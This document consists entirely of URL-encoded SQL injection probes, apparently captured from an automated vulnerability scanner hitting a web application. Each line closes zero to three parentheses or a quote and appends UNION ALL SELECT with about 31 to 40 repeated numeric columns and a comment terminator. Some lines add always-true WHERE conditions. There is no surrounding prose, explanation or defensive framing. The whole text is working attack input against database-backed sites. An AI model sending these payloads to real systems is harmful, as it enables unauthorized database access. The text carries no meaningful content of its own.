-6387%29%20UNION%20ALL%20SELECT%209505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505--%20 -1867%29%20UNION%20ALL%20SELECT%202461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461%2C2461--%20 -7735%29%20UNION%20ALL%20SELECT%208607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607--%20 -7578%29%20UNION%20ALL%20SELECT%203577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577--%20 -5007%29%20UNION%20ALL%20SELECT%203505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505--%20 -5776%29%20UNION%20ALL%20SELECT%205121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121%2C5121--%20 -4572%29%20UNION%20ALL%20SELECT%208963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963%2C8963--%20 -6170%29%20UNION%20ALL%20SELECT%201901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901%2C1901--%20 -7866%29%20UNION%20ALL%20SELECT%205336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336--%20 -4807%29%20UNION%20ALL%20SELECT%208530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530--%20 -8166%29%20UNION%20ALL%20SELECT%204585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585%2C4585--%20 -3380%29%20UNION%20ALL%20SELECT%207299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299%2C7299--%20 -3905%29%20UNION%20ALL%20SELECT%206676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676%2C6676--%20 -1761%29%20UNION%20ALL%20SELECT%204040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040--%20 -1340%29%20UNION%20ALL%20SELECT%206441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441%2C6441--%20 -2385%29%20UNION%20ALL%20SELECT%206206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206%2C6206--%20 -2692%29%20UNION%20ALL%20SELECT%205820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820--%20 -9311%29%20UNION%20ALL%20SELECT%201903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903--%20 -6652%29%29%20UNION%20ALL%20SELECT%202184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184--%20 -9976%29%29%20UNION%20ALL%20SELECT%202348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348%2C2348--%20 -7665%29%29%20UNION%20ALL%20SELECT%202904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904--%20 -3467%29%29%20UNION%20ALL%20SELECT%202167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167%2C2167--%20 -6792%29%29%20UNION%20ALL%20SELECT%207453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453%2C7453--%20 -2925%29%29%20UNION%20ALL%20SELECT%209207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207%2C9207--%20 -6967%29%29%20UNION%20ALL%20SELECT%207783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783%2C7783--%20 -6729%29%29%20UNION%20ALL%20SELECT%204620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620%2C4620--%20 -4181%29%29%20UNION%20ALL%20SELECT%207881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881--%20 -5259%29%29%20UNION%20ALL%20SELECT%202468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468%2C2468--%20 -2103%29%29%29%20UNION%20ALL%20SELECT%206602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602%2C6602--%20 -7341%29%29%29%20UNION%20ALL%20SELECT%204373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373%2C4373--%20 -1547%29%29%29%20UNION%20ALL%20SELECT%207727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727%2C7727--%20 -9246%29%29%29%20UNION%20ALL%20SELECT%206464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464%2C6464--%20 -7654%29%29%29%20UNION%20ALL%20SELECT%201600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600--%20 -5140%29%29%29%20UNION%20ALL%20SELECT%203727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727%2C3727--%20 -1389%29%29%29%20UNION%20ALL%20SELECT%201223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223%2C1223--%20 -7300%29%29%29%20UNION%20ALL%20SELECT%205356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356%2C5356--%20 -3691%29%29%29%20UNION%20ALL%20SELECT%205623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623--%20 -7708%29%29%29%20UNION%20ALL%20SELECT%207077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077--%20 -3725%20UNION%20ALL%20SELECT%207734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734%2C7734--%20 -2174%20UNION%20ALL%20SELECT%204276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276--%20 -8948%20UNION%20ALL%20SELECT%204314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314%2C4314--%20 -8067%20UNION%20ALL%20SELECT%201035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035%2C1035--%20 -7965%20UNION%20ALL%20SELECT%203822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822%2C3822--%20 -3437%20UNION%20ALL%20SELECT%204583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583--%20 -8094%20UNION%20ALL%20SELECT%204357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357%2C4357--%20 -9810%20UNION%20ALL%20SELECT%209210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210--%20 -4291%20UNION%20ALL%20SELECT%203663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663%2C3663--%20 -7588%20UNION%20ALL%20SELECT%208557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557--%20 -8084%29%20WHERE%201714%3D1714%20UNION%20ALL%20SELECT%201714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714%2C1714--%20 -4372%29%20WHERE%204962%3D4962%20UNION%20ALL%20SELECT%204962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962--%20 -2485%29%20WHERE%204134%3D4134%20UNION%20ALL%20SELECT%204134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134--%20 -5861%29%20WHERE%209241%3D9241%20UNION%20ALL%20SELECT%209241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241%2C9241--%20 -7286%29%20WHERE%205519%3D5519%20UNION%20ALL%20SELECT%205519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519--%20 -9589%29%20WHERE%201721%3D1721%20UNION%20ALL%20SELECT%201721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721--%20 -6198%29%20WHERE%206829%3D6829%20UNION%20ALL%20SELECT%206829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829%2C6829--%20 -1630%29%20WHERE%201363%3D1363%20UNION%20ALL%20SELECT%201363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363--%20 -7056%29%20WHERE%207129%3D7129%20UNION%20ALL%20SELECT%207129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129%2C7129--%20 -6504%29%20WHERE%209453%3D9453%20UNION%20ALL%20SELECT%209453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453%2C9453--%20 -9640%20WHERE%201728%3D1728%20UNION%20ALL%20SELECT%201728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728--%20 -9134%20WHERE%206510%3D6510%20UNION%20ALL%20SELECT%206510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510--%20 -6255%20WHERE%209427%3D9427%20UNION%20ALL%20SELECT%209427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427--%20 -6131%20WHERE%208888%3D8888%20UNION%20ALL%20SELECT%208888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888%2C8888--%20 -6569%20WHERE%208387%3D8387%20UNION%20ALL%20SELECT%208387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387%2C8387--%20 -7844%20WHERE%209446%3D9446%20UNION%20ALL%20SELECT%209446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446--%20 -4937%20WHERE%208557%3D8557%20UNION%20ALL%20SELECT%208557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557%2C8557--%20 -8355%20WHERE%203321%3D3321%20UNION%20ALL%20SELECT%203321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321--%20 -7520%20WHERE%203336%3D3336%20UNION%20ALL%20SELECT%203336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336--%20 -2145%20WHERE%204089%3D4089%20UNION%20ALL%20SELECT%204089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089%2C4089--%20 -4389%27%29%20UNION%20ALL%20SELECT%204342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342--%20 -3707%27%29%20UNION%20ALL%20SELECT%204366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366%2C4366--%20 -7268%27%29%20UNION%20ALL%20SELECT%206161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161--%20 -3902%27%29%20UNION%20ALL%20SELECT%204849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849--%20 -9609%27%29%20UNION%20ALL%20SELECT%201109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109--%20 